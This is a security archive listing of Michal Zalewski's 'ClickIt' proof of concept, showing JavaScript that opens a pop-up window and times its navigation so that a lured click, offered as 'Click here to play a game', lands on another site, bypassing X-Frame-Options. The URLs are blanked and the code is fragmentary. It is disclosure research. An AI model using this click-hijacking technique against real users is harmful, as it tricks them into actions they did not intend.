ClickIt Proof Of Concept

Type packetstorm
Reporter Michal Zalewski
Modified 2011-12-13T00:00:00


                                            `<h3><i>X-Frame-Options</i> is worth less than you think</h3>  
var w;  
var dummy;  
var it;  
// Precache stuff.  
x = new Image();  
x.src = '';  
x2 = new Image();  
x2.src = '';  
x3 = new Image();  
x3.src = '';  
x4 = new Image();  
x4.src = '';  
function prepare() {  
w = open('','_blank');  
setTimeout(complete, 300);  
function complete() {  
w.location.href = '';  
setTimeout(goback, 1000);  
function goback() {  
try {  
if (w.document.body.innerHTML == undefined) throw 1;  
setTimeout(goback, 100);  
} catch (e) {  
// That one case where prompts.tab_modal.enabled=true would have helped in Firefox...  
if (navigator.userAgent.indexOf('Firefox/') != -1)  
setTimeout('w.location.href = ""', 1500);  
setTimeout('w.location.href = ""', 500);  
JavaScript allows you to exploit human cognitive abilities to a remarkable extent; tools such as  
window positioning, <code>history.forward()</code> and <code>history.back()</code>, open some  
scary possibilities that we are <a href="">completely unprepared to deal with</a>.  
This proof-of-concept aims to demonstrate this; while it is intentionally crude and makes no real effort to  
conceal its operation, the transitions <a href="">can be made seamless</a> and very  
difficult to perceive. Very accurate click prediction can be achieved by carefully measuring  
mouse velocity and distance to destination, too.  
I discuss these attacks and many other unsolved challenges in web app design in  
<i><a href="">"The Tangled Web"</a></i>.  
A similar approach poses a problem with many browser UIs; for that,   
<a href="">check out this post</a>.  
<input type=submit value="Click here to play a game" onclick="prepare()">